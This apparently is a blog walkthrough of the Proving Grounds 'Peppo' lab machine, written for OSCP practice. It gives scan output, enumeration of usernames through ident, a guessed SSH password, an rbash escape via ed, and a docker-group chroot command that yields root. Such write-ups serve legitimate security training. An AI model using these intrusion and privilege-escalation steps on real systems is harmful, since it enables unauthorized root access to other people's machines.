Proving grounds:Peppo
Today we will take a look at Proving grounds: Peppo. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 754c0201fa1e9fcce47b52feba3685a9 (RSA)
| 256 b76f9c2bbffb0462f418c938f43d6b2b (ECDSA)
|_ 256 987fb640cebbb557d5d13c65727487c3 (ED25519)
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 12.3 - 12.4
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
|_http-title: Redmine
10000/tcp open snet-sensor-mgmt?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:37 GMT
| Connection: close
| Hello World
| GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:26 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:27 GMT
| Connection: close
|_ Hello World
|_auth-owners: eleanor- 113 (FreeBSD identd)
Enumerate and find usernames.
└─$ ident-user-enum 192.168.60.60 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.60.60:10000 eleanorOr you can look at nmap results.
|_auth-owners: eleanor- eleanor
I searched hard when I entered eleanor but there was one small thing I missed. eleanor had entered her name in her password
log in with ssh
eleanor:eleanor
eleanor@peppo:~$ cat local.txt
-rbash: cat: command not found
it seems restricted.
eleanor@peppo:~$ id
-rbash: id: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ ls -la bin
total 8
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
drwxr-xr-x 4 eleanor eleanor 4096 Jan 20 07:21 ..
lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch
Use ed, a command line editor, to escape the jail.
eleanor@peppo:~$ ed
!/bin/bash
eleanor@peppo:~$ export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin- Privesc (docker)
eleanor@peppo:~$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
eleanor is a member of the docker group
Use this and get root
https://gtfobins.github.io/gtfobins/docker/#shell
eleanor@peppo:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
redmine latest 0c8429c66e07 2 years ago 542MB
postgres latest adf2b126dda8 2 years ago 313MB
eleanor@peppo:~$ docker run -v /:/mnt --rm -it redmine chroot /mnt bash
root@7fb1c5126951:/# whoami
rootAnd now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
